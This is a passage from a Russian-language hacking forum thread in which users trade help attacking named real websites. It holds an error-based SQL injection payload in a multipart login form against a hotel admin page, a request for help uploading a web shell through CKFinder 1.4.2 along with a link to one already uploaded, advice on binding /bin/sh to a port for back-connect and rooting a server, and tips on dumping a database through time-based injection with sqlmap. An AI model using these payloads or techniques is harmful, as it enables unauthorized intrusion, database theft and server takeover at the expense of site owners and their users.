Content-Disposition: form-data; name="authorize"\r\n

\r\n

1\r\n

-----------------------------219001973211145\r\n

Content-Disposition: form-data; name="login"\r\n

\r\n

admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n

-----------------------------219001973211145\r\n

Content-Disposition: form-data; name="password"\r\n

\r\n

sdsdgsg\r\n

-----------------------------219001973211145--\r\n

зачем sqlmap здесь?

xivi00
21.10.2015, 00:38
Br@!ns said:
↑ (https://antichat.live/posts/3904927/)
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="authorize"\r\n
\r\n
1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="login"\r\n
\r\n
admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sdsdgsg\r\n
-----------------------------219001973211145--\r\n
зачем sqlmap здесь?


руками не дорос еще крутить

faza02
21.10.2015, 00:57
[/URL]

(https://antichat.live/threads/424557/page-13/)

[URL="https://antichat.live/threads/424557/page-13/"]xivi00 said: (https://antichat.live/threads/424557/page-13/)
↑ (https://antichat.live/posts/3904924/)
http://www.bogema-hotel.ru/access_admin.php
в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться



/threads/424557/page-13#post-3861751 (https://antichat.live/threads/424557/page-13/)

kacergei
21.10.2015, 11:31
помогите пожалуйста здесь в ckfinder'e 1.4.2 можно как нибудь шел залить?

Как только не пробывал и через форму отдельную к connector'y и так

Получается так; _php;.txt

загруженный шел;

.SpoilerTarget" type="button">Spoiler: shell
aromagiya.kz/cms/uploads/files/Sh3LL_php;.txt
ckfinder:

.SpoilerTarget" type="button">Spoiler: ckfinder
aromagiya.kz/cms/files/appends/ckfinder/ckfinder.html

Waki
21.10.2015, 21:11
Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?

Как и когда это использовать, объясните если не трудно

Br@!ns
21.10.2015, 21:38
Waki said:
↑ (https://antichat.live/posts/3905323/)
Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?
Как и когда это использовать, объясните если не трудно


для бэк коннекта, для порута сервера

Waki
21.10.2015, 21:43
Br@!ns said:
↑ (https://antichat.live/posts/3905340/)
для бэк коннекта, для порута сервера


где можно почитать об этом подробней? я не до конца понимаю как это делается, нажать в шелле, а что дальше неизвестно)

faza02
21.10.2015, 22:04
Waki said:
↑ (https://antichat.live/posts/3905344/)
где можно почитать об этом подробней? я не до конца понимаю как это делается, нажать в шелле, а что дальше неизвестно)


в закрепленных темах в этом разделе есть тема "повышение привилегий"

Roger96
21.10.2015, 22:09
Можно ли както слить базу?!

.SpoilerTarget" type="button">Spoiler: Скрин
http://i.shotnes.com/a/21/a1rh32f0.ngc_5627d4b09718d.png

.SpoilerTarget" type="button">Spoiler: и тут
http://i.shotnes.com/a/21/admfrjvo.ojp_5627da3fca52e.png
или подскажите в icq 660668871

RedFern.89
22.10.2015, 00:28
Roger96 said:
↑ (https://antichat.live/posts/3905354/)
или подскажите в icq 660668871


mysql time based там

Roger96
22.10.2015, 00:46
RedFern.89 said:
↑ (https://antichat.live/posts/3905393/)
mysql time based там


на первом или втором? и как ее раскрутить? ну базу слить

RedFern.89
22.10.2015, 02:09
Roger96 said:
↑ (https://antichat.live/posts/3905400/)
на первом или втором? и как ее раскрутить? ну базу слить


первом, через sqlmap спокойно льется

Roger96
22.10.2015, 02:28
RedFern.89 said:
↑ (https://antichat.live/posts/3905411/)
первом, через sqlmap спокойно льется


дану? это где js library? а не подскажешь запрос как сдампить? плиз

Не сказать что норм льется: http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png

xivi00
22.10.2015, 14:46
Roger96 said:
↑ (https://antichat.live/posts/3905417/)
дану? это где js library? а не подскажешь запрос как сдампить? плиз
Не сказать что норм льется:
http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png


что это за породи я на sqlmap

Roger96
22.10.2015, 23:36
xivi00 said:
↑ (https://antichat.live/posts/3905567/)
что это за породи я на sqlmap


посмотрел,сравнил - обычный